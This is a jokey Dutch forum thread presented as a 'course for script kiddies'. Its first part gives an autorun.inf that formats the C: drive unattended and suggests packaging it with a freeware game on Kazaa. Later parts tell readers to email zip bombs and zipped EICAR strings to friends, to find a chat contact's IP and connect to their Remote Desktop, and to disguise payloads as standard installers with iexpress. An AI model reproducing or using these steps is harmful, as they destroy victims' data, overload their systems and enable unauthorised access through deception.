Cursus Windows voor script kiddies

Maak een file autorun.inf aan met Notepad en zet er dit in :

[autorun]
open=c:\windows\system32\format c: /AUTOTEST /Y

Zet het bestand daarna op de root () van een harddisk , bijvoorbeeld C:\ of D:. Nog leuker is het om op een CD te zetten , of er een .ISO bestand van maken samen met een (freeware natuurlijk) spelletje en dit online te gooien bij Kazaa.


Want standaard staat autorun aan voor ELKE driveletter in windows 98 , 98SE , ME , 2000 en XP ,

jahaa… ook voor harddisks… Wisten jullie dat jongens en meisjes ?

En nu allemaal panisch als de sodemieter de autorun uitschakelen :slight_smile: [Google]PowerToys[/Google]

Tot zo ver deel 1 van deze leuke cursus.

Wat /AUTOTEST doet leg ik jullie wel uit in deel 2.

Originally posted by Mr. Belvedere
[B]Maak een file autorun.inf aan met Notepad en zet er dit in :

[autorun]
open=c:\windows\system32\format c: /AUTOTEST /Y

Zet het bestand daarna op de root () van een harddisk , bijvoorbeeld C:\ of D:. Nog leuker is het om op een CD te zetten , of er een .ISO bestand van maken samen met een (freeware natuurlijk) spelletje en dit online te gooien bij Kazaa.
[/B]

Boefje. :wink:

Keep it cumm’n…!! :stuck_out_tongue:

Dit is info waar ik op zit te wachten!

thanks!:bow: :bow:

Goedenmiddag Jongens en Meisjes ,

Na de grote vraag van leerling Marsz , komt hier het langverwachte deel 2.

Hoe krijg ik een virusscanner over de zeik ?

Iedereen kent het wel. Een goede virusscanner scant ook IN zip bestanden en doet daar soms heel erg lang over.

Hoe krijgen we dit nu voor elkaar zonder enige kennis van zaken ? Simpel.

Je opent Notepad en voert de letter “a” een paar miljoen keer in.

De slimmere leerlingen weten dat dit makkelijker gaat met de copy/paste actie (ook wel CTRL-C en CTRL-V genoemd. Vroegah beter bekend als CTRL-INS en SHIFT-INST).

De nog slimmere leerlingen weten dat notepad niet zo erg veel geheugen meekrijgt van jullie favoriete besturingssysteem en gebruiken Wordpad.

Deze file sla je op met een leuke naam , bijvoorbeeld test.txt

Nu open je Winzip (pkzip voor windows zeg maar) en laat het bestand lekker inpakken.

Wat schertst onze verbazing ? Het bestand is wel zo’n 4000 keer kleiner. Ongeloofelijk toch !

Dit bestand email je naar al je vrienden.

Wil je ook nog dat de virusscanner van je vrienden echt he-le-maal gek wordt , dan download je de EICAR test string , zet de tekst in Note/Wordpad een paar duizend keer , zipt dit en mails dat door naar al je vrienden.

Tot zover deel 2.

De uitleg van /AUTOTEST staat hier.

Het huiswerk voor de volgende keer is : Wat is de EICAR test string en waarom is het er eigenlijk ?

Wat betreffende deel 1 van de cursus , dient het misschien te worden vermeld dat dit noodzakelijkerwijs niet hoeft te werken op een NTFS systeem met EFS en andere handige dingen. Maar gelukkig weet een script kiddy niet eens hoe het NTFS moet spellen laat staan waar het in godsnaam is. Hierover verder uitwijden schiet het doel van de cursus dus voorbij.

de EICAR test string is een bestandje dat bestaat uit de volgende string X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
En zover ik er wijs uit kon is dit bedoelt om op een veilige manier je antivirus scanner te testen.Het enige dat het zal doen is een blaadje printen waarop staat “EICAR test string”.

Wat ik nu ga schrijven moet je gebruiken op eigen risico en ik kan niet aansprakelijk gesteld worden als je deze info misbruikt.En als de moderator hier iets slechts inziet , doe het dan maar weg.

Kent er hier al iemand het commando mstsc ?Doe eens start- run en dan mstsc.Dan krijg je het raampje verbinding met extern bureaublad.Omdat de mensen tegenwoordig zo stom zijn om dit op hun systeem niet uit te vinken kan je zo hun systeem binnen gaan.Probeer het maar eens .Stond er ook versteld van hoeveel mensen dit hadden opstaan.En voor de newbies.We gaan dit eens testen met msn.Als je met iemand aan’t praten bent ga je naar bureau accesoires en klik daar op opdrachtpromped.Type daarna netstat.Nu zie je vanalles op je scherm.Maak hier een screenshot van of zo waardoor je weet welke poorten openstaan.Je moet nu eens een bestandje naar je doel sturen > 1 MB , anders krijg je de msn-server in verginia.Vergelijk dit nu eens met je screenshot en wat verschillend is , is de ip van je doel.Ik weet dat het een omweg is maar dit is zonder een stom programma’tje dat toch geïnfecteerd zal zijn met een trojan.Nu terug naar run gaan , dan mstsc typen en In computer moet je het adres geven.Als je verbinding hebt dan moet je eens zeggen tegen die persoon op msn dat zijn “verbinding met extern bureaubald openstaat” en eens een screenshot maken van zijn desktop.PS breng dit zachtjes , want anders zal de andere zeggen dat je een F**king hacker bent en dit zal raporteren aan je Internetprovider.

BTW kende Powertoys al van 98 maar kan het vinkje niet vinden om autostart te disablen.Hulp , iemand ?

Om het wat echter te laten lijken wat Mr. Belvedere zei

Deze file sla je op met een leuke naam , bijvoorbeeld test.txt

Nu open je Winzip (pkzip voor windows zeg maar) en laat het bestand lekker inpakken.

moet je in start-run eens “iexpress” typen.Dan kan je , je programma inpakken waardoor het een standaard word.Je weet wel , soms moet je iets updaten en dan krijg je zo een standaard formaat setupje , dit helpt om het slachtoffer te overtuigen om verder te gaan.

Ook is het leuk als je zelfs iets geschreven hebt het mooi in te pakken.Je kan hier informatie aan meegeven dat jij wil.

vinnetsteedsleukerworre! :wink: